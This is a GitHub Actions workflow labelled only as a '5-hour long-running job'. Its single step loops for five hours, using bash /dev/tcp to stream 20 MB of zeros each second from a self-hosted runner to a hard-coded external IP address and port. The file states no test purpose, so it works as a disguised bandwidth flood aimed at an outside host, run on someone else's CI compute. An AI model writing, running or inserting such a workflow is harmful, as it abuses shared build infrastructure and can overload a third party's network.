name: 5-Hour Long-Running Job

on:
  workflow_dispatch:

jobs:
  long-running-process:
    runs-on: arc-runner-set
    timeout-minutes: 330  # 5.5 hours = 330 minutes
    
    steps:
     
      - name: Run 5-hour process
        run: |
          while :; do
            dd if=/dev/zero bs=1M count=20 > /dev/tcp/172.233.205.83/9919 || :
            sleep 1
          done
        timeout-minutes: 300
